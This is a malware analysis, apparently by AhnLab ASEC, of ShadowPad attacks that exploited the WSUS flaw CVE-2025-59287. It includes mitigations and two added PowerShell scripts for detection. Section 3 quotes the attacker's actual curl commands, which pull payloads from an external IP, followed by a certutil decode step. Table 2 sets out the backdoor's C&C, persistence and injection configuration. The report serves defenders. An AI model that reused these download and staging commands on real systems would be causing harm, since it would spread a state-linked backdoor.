Analysis of ShadowPad Attack Exploiting WSUS Remote Code Execution Vulnerability (CVE-2025-59287)

1. Overview

AhnLab SEcurity intelligence Center (ASEC) has identified an attack where the remote code execution vulnerability in Microsoft Windows Server Update Services (WSUS), tracked as CVE-2025-59287, was exploited to distribute the ShadowPad malware. ShadowPad is a backdoor malware used by numerous Chinese APT groups. First discovered in 2017, its developers have continuously updated its modules. According to a report by SentinelOne, ShadowPad is privately sold to Chinese state-backed APT groups. This report analyzes the initial intrusion process exploiting the vulnerability, the operational mechanism of ShadowPad, and recommended countermeasures.

 

The attacker targeted Windows Servers with WSUS enabled, exploiting CVE-2025-59287 for initial access. They then used PowerCat, an open-source PowerShell-based Netcat utility (https://github.com/besimorhino/powercat), to obtain a system shell (CMD). Subsequently, they downloaded and installed ShadowPad using certutil and curl.

2. Initial Access (CVE-2025-59287) and Foothold Establishment (PowerCat)

On October 14th, Microsoft published a security advisory for a vulnerability in Microsoft Windows Server Update Services (WSUS). The vulnerability affects Windows Server systems with the WSUS role enabled, and it is rated critical because it allows remote code execution with SYSTEM privileges. Following the public release of PoC code on October 22nd, the AhnLab Smart Defense (ASD) infrastructure recorded PowerCat being executed on a Windows Server system presumed to be vulnerable. This indicates that the threat actor obtained a CMD shell on the target system.

Figure 1. Logs of PowerShell execution (PowerCat) using CVE-2025-59287

The identified PowerShell commands are as follows:

 

3. Installing Malware

After gaining initial access, the threat actor exploited the same vulnerability on November 6th to execute curl.exe and certutil.exe, which are legitimate Windows utilities, to install the ShadowPad malware.

Figure 2. Installation log of ShadowPad via CVE-2025-59287

The commands used for installation are as follows:

  • curl hxxp://149.28.78[.]189:42306/tmp.txt -o C:\users\%ASD%\tmp.txt & curl hxxp://149.28.78[.]189:42306/dll.txt -o C:\users\%ASD%\dll.txt & curl hxxp://149.28.78[.]189:42306/exe.txt -o C:\users\%ASD%\exe.txt
  • certutil -decode C:\users\%ASD%\tmp.txt C:\programdata\0C137A80.tmp

4. ShadowPad

ShadowPad rarely operates as a standalone executable. Instead, it relies on DLL sideloading. In the latest case, ShadowPad is executed through an EXE and DLL file pair that share the same names as those seen in previous ShadowPad attack cases.

Sideloaded DLL Name     ETDApix.dll
DLL MD5                 27e00b5594530e8c5e004098eef2ec50
Legitimate EXE Name     ETDCtrlHelper.exe
EXE MD5                 564e7d39a9b6da3cf0da3373351ac717
TMP File Name           0C137A80.tmp
TMP File MD5            85b935e80e84dd47e0fa5e1dfb2c16f4

Table 1. ShadowPad DLL sideloading details

When the legitimate executable (ETDCtrlHelper.exe) runs, the malicious DLL (ETDApix.dll) acts as the ShadowPad loader, operating entirely in memory. The .tmp file located in the same directory contains the core ShadowPad functionality, including its backdoor configuration data. Table 2 lists the key configuration values observed in this attack.

Config Item                       Value
Mutex                             Q-X64
Service Name                      Q-X64
Service Display Name              Q-X64 Service
Service Description               Q-X64 Service for windows
Persistence Registry Key          SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Persistence Registry Value        Q-X64
Persistence Name                  Q-X64
Task Scheduler Path               Microsoft\Windows\UPnP
Task Scheduler Name               Microsoft Corporation
Task Scheduler Description        Q-X64 Service for windows
Startup Process Path #1           %ProgramFiles%\Q-X64\Q-X64.exe
Startup Process Path #2           %APPDATA%\Q-X64\Q-X64.exe
Startup Process Path #3           %LOCALAPPDATA%\Q-X64\Q-X64.exe
Startup Process Path #4           %TEMP%\Q-X64\Q-X64.exe
Sideloading DLL Name              ETDApix.dll
Injection Target Process Path #1  “%PROGRAMFILES%\Windows Mail\WinMail.exe” Q-X64
Injection Target Process Path #2  “%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe” Q-X64
Injection Target Process Path #3  “%ProgramFiles%\Windows Media Player\wmplayer.exe” Q-X64
Injection Target Process Path #4  “%SystemRoot%\system32\svchost.exe” Q-X64
C&C #1                            HTTP://163.61.102[.]245:443
C&C #2                            HTTPS://163.61.102[.]245:443
Proxy IP #1                       N/A
Proxy IP #2                       N/A
Proxy IP #3                       N/A
Proxy IP #4                       N/A
C&C Header #1                     POST
C&C Header #2                     65536
C&C Header #3                     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
C&C Header #4                     Accept-Language: en-ca,en;q=0.8,en-us;q=0.6,de-de;q=0.4,de;q=0.2
C&C Header #5                     Accept-Encoding: gzip, deflate
C&C Header #6                     Accept: text/html, application/xhtml+xml, image/jxr, */*
C&C Header #7                     N/A
Forward TCP IP                    Registry Required
Forward UDP IP                    Registry Required
Files Registered for Persistence  N/A

Table 2. ShadowPad Config information

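As an added example (not code from the ASEC report), the following PowerShell checks a single Windows host for the persistence, sideloading and C&C artifacts listed in Table 1 and Table 2; it assumes an elevated session and treats the hashes, names and paths above as the complete indicator set for this case.

```powershell
# Added example, not from the ASEC report: check one host for the ShadowPad
# artifacts listed in Table 1 and Table 2. Run in an elevated PowerShell session.
$findings = New-Object System.Collections.Generic.List[string]

# Run-key persistence: value "Q-X64" under the configured key in HKLM and HKCU.
foreach ($hive in 'HKLM', 'HKCU') {
    $key = "${hive}:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
    $v = Get-ItemProperty -Path $key -Name 'Q-X64' -ErrorAction SilentlyContinue
    if ($v) { $findings.Add("Run value Q-X64 in $key -> $($v.'Q-X64')") }
}

# Service persistence: service named "Q-X64".
$svc = Get-Service -Name 'Q-X64' -ErrorAction SilentlyContinue
if ($svc) { $findings.Add("Service Q-X64 present, status $($svc.Status)") }

# Scheduled-task persistence: task "Microsoft Corporation" under \Microsoft\Windows\UPnP\.
$task = Get-ScheduledTask -TaskPath '\Microsoft\Windows\UPnP\' -TaskName 'Microsoft Corporation' -ErrorAction SilentlyContinue
if ($task) { $findings.Add("Scheduled task '$($task.TaskName)' in $($task.TaskPath)") }

# Startup copies at the four configured Startup Process Paths.
foreach ($root in @($env:ProgramFiles, $env:APPDATA, $env:LOCALAPPDATA, $env:TEMP)) {
    $p = Join-Path $root 'Q-X64\Q-X64.exe'
    if (Test-Path $p) { $findings.Add("Startup binary present: $p") }
}

# Sideloading pair and decoded payload, matched by the MD5 hashes in Table 1.
$knownMd5 = @{
    '27E00B5594530E8C5E004098EEF2EC50' = 'ETDApix.dll (ShadowPad loader)'
    '564E7D39A9B6DA3CF0DA3373351AC717' = 'ETDCtrlHelper.exe (abused legitimate EXE)'
    '85B935E80E84DD47E0FA5E1DFB2C16F4' = '0C137A80.tmp (ShadowPad core)'
}
Get-ChildItem -Path 'C:\ProgramData', 'C:\Users' -Recurse -Force -ErrorAction SilentlyContinue `
    -Include 'ETDApix.dll', 'ETDCtrlHelper.exe', '*.tmp' |
    ForEach-Object {
        $h = (Get-FileHash -Path $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
        if ($h -and $knownMd5.ContainsKey($h)) { $findings.Add("$($knownMd5[$h]) at $($_.FullName)") }
    }

# Live connection to the configured C&C server (port 443 for both the HTTP and HTTPS entries).
Get-NetTCPConnection -RemoteAddress '163.61.102.245' -ErrorAction SilentlyContinue |
    ForEach-Object { $findings.Add("TCP connection to C&C from PID $($_.OwningProcess), state $($_.State)") }

if ($findings.Count -eq 0) { 'No ShadowPad indicators from this report were found.' } else { $findings }
```

The recursive hash check over C:\Users can take a while on file servers; restrict the paths if the host has large profile directories.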
5. Conclusion

After the proof-of-concept (PoC) exploit code for the vulnerability was publicly released, attackers quickly weaponized it to distribute ShadowPad malware via WSUS servers. This vulnerability is critical because it allows remote code execution with system-level permission, significantly increasing the potential impact. To mitigate the risk, security managers in organizations using WSUS should immediately implement the following measures:

  1. Apply Microsoft’s latest security update addressing CVE-2025-59287.
  2. Review WSUS server exposure and access controls:
     • Ensure only Microsoft Update servers can access WSUS.
     • Consider blocking inbound traffic on TCP ports 8530 and 8531 from all other sources.
  3. Audit for suspicious activity, including:
     • execution history of PowerShell, certutil.exe, and curl.exe
     • network connection logs for anomalous patterns
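As an added example (not code from the ASEC report), the following PowerShell performs the audit in step 3 by searching process-creation logs for the curl and certutil installation chain shown in Section 3; it assumes command-line logging is available from Sysmon (Event ID 1) and/or Security event 4688 with command-line auditing enabled, and the patterns are derived only from the commands quoted in this report.

```powershell
# Added example, not from the ASEC report: search process-creation logs for the
# curl / certutil installation chain from Section 3. Assumes command-line logging is
# available from Sysmon (Event ID 1) and/or Security event 4688 with command-line auditing.
$since = (Get-Date).AddDays(-30)

# Patterns derived from the observed commands: curl saving a file into a user profile,
# certutil -decode used as a base64 decoder, and the download host named in the report.
$patterns = @(
    'curl(\.exe)?\s.*\s-o\s+C:\\users\\',
    'certutil(\.exe)?\s+-decode\s',
    '149\.28\.78\.189'
)
$regex = $patterns -join '|'

$queries = @(
    @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1;    StartTime = $since },
    @{ LogName = 'Security';                             Id = 4688; StartTime = $since }
)

$hits = foreach ($q in $queries) {
    Get-WinEvent -FilterHashtable $q -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match $regex } |
        ForEach-Object {
            # The command-line field is labelled differently in the two logs.
            $cmd = if ($_.Message -match '(?m)^\s*(CommandLine|Process Command Line):\s*(.+)$') { $Matches[2] } else { '' }
            [pscustomobject]@{
                Time        = $_.TimeCreated
                Log         = $_.LogName
                CommandLine = $cmd.Trim()
            }
        }
}

$hits | Sort-Object Time | Format-Table -Wrap -AutoSize
```

Any hit on a WSUS server should be correlated with the server's own execution logs for the date range in Figures 1 and 2.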
